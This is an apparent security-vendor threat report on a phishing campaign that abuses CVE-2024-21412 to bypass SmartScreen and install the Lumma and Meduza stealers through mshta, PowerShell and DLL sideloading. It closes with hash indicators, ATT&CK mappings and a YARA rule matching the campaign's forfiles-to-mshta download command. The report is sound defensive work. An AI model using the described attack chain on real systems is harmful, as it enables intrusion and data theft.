Key Takeaways 

• Cyble Research and Intelligence Labs (CRIL) recently came across an active campaign exploiting the Microsoft SmartScreen vulnerability (CVE-2024-21412).  

• The ongoing campaign targets multiple regions, including Spain, the US, and Australia. 

• It employs lures related to healthcare insurance schemes, transportation notices, and tax-related communications to deceive individuals and organizations into downloading malicious payloads onto their machines. 

• The infection starts with a spam email containing a link that redirects users to a WebDAV share using a search protocol, deceiving them into executing a malicious internet shortcut file, exploiting CVE-2024-21412. 

• The threat actors (TAs) conducted a multi-stage attack utilizing legitimate tools such as forfiles.exe, PowerShell, mshta, and other trusted files to circumvent security measures. 

• The attack chain utilizes DLL sideloading and IDATLoader to inject the final payload into explorer.exe. 

• This campaign delivers Lumma and Meduza Stealer as its final payloads.  

Overview 

The Zero Day Initiative (ZDI) uncovered a sophisticated DarkGate campaign in mid-January 2024, exploiting CVE-2024-21412 through fake software installers. On February 13, 2024, Microsoft patched this Microsoft Defender SmartScreen vulnerability, which involved internet shortcuts. Later, the APT group known as Water Hydra has been leveraging CVE-2024-21412 in a targeted campaign against financial market traders, bypassing SmartScreen to deploy the DarkMe remote access trojan (RAT). 

Recently, CRIL came across an active campaign, abusing internet shortcuts (URL). In this campaign, TAs exploited the CVE-2024-21412 vulnerability to bypass Microsoft Defender SmartScreen and deploy payloads on victims’ systems.  

The initial infection starts with a spam email that appears to come from a trusted source. The email is crafted to entice the recipient into clicking a link, which tricks the user into viewing an internet shortcut file hosted on a remote WebDAV share. When the user double-clicks the internet shortcut file, it exploits CVE-2024-21212 and executes another LNK file hosted on the same WebDAV share, initiating the infection process.  

This attack employs a multifaceted approach, utilizing various script files, including PowerShell and JavaScript, to deliver the final payload. This multi-stage process ultimately culminates in the deployment of malicious payloads like Lumma and Meduza Stealer, both of which focus on collecting sensitive information from the victim’s machine.  

The image below shows the infection chain observed in the current campaign. 

Figure 1 – Overview of the Infection Chain 

Victimology 

The threat actor targets a wide array of individuals and organizations across various regions and sectors. Based on the lure documents observed in this campaign, the threat actor targets Spanish taxpayers, transportation companies with emails purportedly from the US Department of Transportation, and individuals in Australia by mimicking official Medicare enrollment forms, as shown in the images below. 

Figure 2 – Lure Document 

Figure 3 – Lure Document 

Figure 4 – Lure Document 

Technical Analysis 

In this campaign, TAs likely enticed users to click on a malicious link included in a spam email. The link contains a search protocol that redirects users to a WebDAV share hosting an Internet Shortcut (.url) file, as shown below. 

Figure 5 – Malicious url file 

When a user opens the internet shortcut file, it exploits CVE-2024-21412 to evade Microsoft Defender SmartScreen and triggers the execution of the LNK file hosted on the same WebDAV share. 

Upon execution, the malicious LNK file triggers the forfiles utility, a legitimate Windows executable designed for batch-processing files. This utility locates the “win.ini” file within the C:\Windows directory. If it successfully finds the “win.ini” file, forfiles.exe proceeds to execute a PowerShell command. The figure below shows various command line parameters utilized by the .LNK files in this campaign: 

Figure 6 – Different LNK files used in this campaign 

The PowerShell command leverages “mshta.exe” to execute a malicious file hosted on a remote server. Interestingly, the hosted file is an exe file named “dialer.exe”, which has been altered to include embedded malicious JavaScript. MSHTA possesses a versatile parser capable of interpreting HTA content within files of any extension or even those with no extension. This flexibility enables MSHTA to bypass unrecognized data and execute only the HTA file or embedded scripts such as VBScript or JavaScript. Threat actors employ this method to exploit MSHTA for executing the malicious JavaScript embedded within the dialer.exe file. In this campaign, it’s also observed that the threat actor has altered a file named “BthUdTask.exe” to execute the malicious JavaScript. 

The image below shows the embedded JavaScript within the downloaded file. 

Figure 7 – Embedded JavaScript 

The embedded JavaScript utilizes the String.fromCharCode() method to decode and execute a PowerShell Script, as shown below. 

Figure 8 – PowerShell  Code 

The above PowerShell script decrypts the AES-encrypted blocks to load another PowerShell script, as shown in Figure 9. 

Figure 9 – Decrypted content 

This PowerShell script downloads the lure document and another 7z installer file from the remote server and saves them to C:\Users\user\AppData\Roaming\. Upon successful download, the PowerShell script opens the lure document and executes the installer file.  

The installer file then drops additional files, including clean files, dependency DLLs, a malicious DLL for side-loading, and an encrypted IDAT loader, as depicted in Figure 10. 

Figure 10 – Extracted files 

After placing all the files in the %appdata% directory, the installer file begins DLL side-loading by launching a legitimate file. This legitimate file then loads a malicious DLL, which retrieves the content of the IDAT loader, decrypts it, and injects the payload into explorer.exe. In this campaign, the injected content, recognized as Lumma and Mdeuza Stealer, subsequently carries out malicious operations on compromised systems. The figure below illustrates the DLL sideloading. 

Figure 11 – DLL sideloading 

The figure below shows the infection chain. 

Figure 12 – Process tree 

Conclusion 

The recent surge in the exploitation of CVE-2024-21412, alongside the adoption of sophisticated techniques such as DLL sideloading and IDATLoader combinations, highlights how cyber threats continue to evolve in an increasingly dynamic and dangerous threat landscape.  

This trend may be fueled by accessible Malware-as-a-Service (MaaS) offerings, enabling malicious actors to deploy advanced tools more readily. Proactive measures and ongoing adaptation are essential in mitigating these evolving threats and safeguarding digital environments. 

Recommendations 

• This campaign reaches users via potential phishing campaigns, so exercise extreme caution when handling email attachments and external links. Always verify the legitimacy of the sender and links before opening them.  

• Implement advanced email filtering solutions to detect and block malicious attachments and links. 

• Avoid clicking on suspicious links or downloading URL files from untrusted sources. 

• Regularly update operating systems, software, and applications to patch known vulnerabilities that threat actors can exploit. 

• The campaign abused the legitimate forfiles utility; hence, it is advised to monitor the activities conducted by the forfiles utility and restrict access to limited users.  

• Consider disabling or limiting the execution of scripting languages on user workstations and servers if they are not essential for legitimate purposes. 

• Implement application whitelisting to ensure only approved and trusted applications and DLLs can execute on your systems 

• Implement network segmentation to limit the spread of malware within the organization. 

MITRE ATT&CK® Techniques 

Tactics	Techniques	Procedure
Initial Access (TA0001)	Phishing (T1566.002)	Spear phishing emails with a malicious link
Initial Access (TA0001)	Exploits T1190	Exploit Public-Facing Application
Execution (TA0002)	Command and Scripting Interpreter (T1059)	PowerShell scripts are executed
Defense Evasion (TA0005)	System Binary Proxy Execution: Mshta (T1218.005)	Abuse mshta.exe to proxy execution of malicious hta file
Defense Evasion (TA0005)	Masquerading (T1036)	Double extension is used for masquerading
Defense Evasion   (TA0005)	Obfuscated Files or    Information (T1027)	Obfuscated PowerShell and JavaScript are used
Privilege    Escalation   (TA0004)	DLL Side-Loading (T1574.002)	TAs execute their own    malicious payloads by side-loading DLLs.
Privilege    Escalation   (TA0004)	Process Injection (T1055)	Injects malicious content into Explorer.exe   process.
C&C   (TA0011)	Application Layer Protocol   (T1071)	Stealer communicates with the C&C server.

Indicators Of Compromise 

Indicators	Indicator   Type	Description
58e2b766dec37cc5fcfb63bc16d69627cd87e7e46f0b9f48899889479f12611e  268a0de2468726a106fd92563a846e764f2ba313e37b5fc0cf76171b0a363f6f  aceee450c55d61671c2d3d154b5f77e7f99688b6da8a8f3256a4bae2cdb76a4c  2460e7590e09af09ced6f75c001a9066c18629d956edbe8041f08cd21b7528b2  4eccb7813cee8c8039424aebf69f4269d4a6c2c72d81a001254bcdce80034555  6481462f15ad4213f83a3d28304f14496bae1feb8580056959a657d0ee8981db  7ee31fa89e9e68f20004bdc31f8f05a95861b6c678bfa3b57f09fdfad9ef5290  81e89754ae2324c684fce71acafc30f8085870be947e7a76971b4fec1b24b5d1  473abb2c272295473e5556ec7dec06f2018c0a67f208d8ab33de1fb6d40895f5	SHA256	Malicious LNK files from this campaign

Yara Rule 

rule Malicious_LNK 

{ 

  meta: 

    author = "CRIL" 

    description = "Yara Rule to Identify Malicious LNK Files" 

strings: 

    $str1 = "C:\\Windows /m win.ini /c" wide ascii     

    $str2 = "C:\\Windows\\System32\\forfiles.exe" wide ascii 

    $str3 = "powershell . mshta http" wide ascii 

 

condition: 

    (uint32(0) == 0x0000004C) and all of ($str*) 

} 

References 

https://www.trendmicro.com/en_in/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html
https://x.com/AvastThreatLabs/status/1807809150803497241 
https://www.kroll.com/en/insights/publications/cyber/idatloader-distribution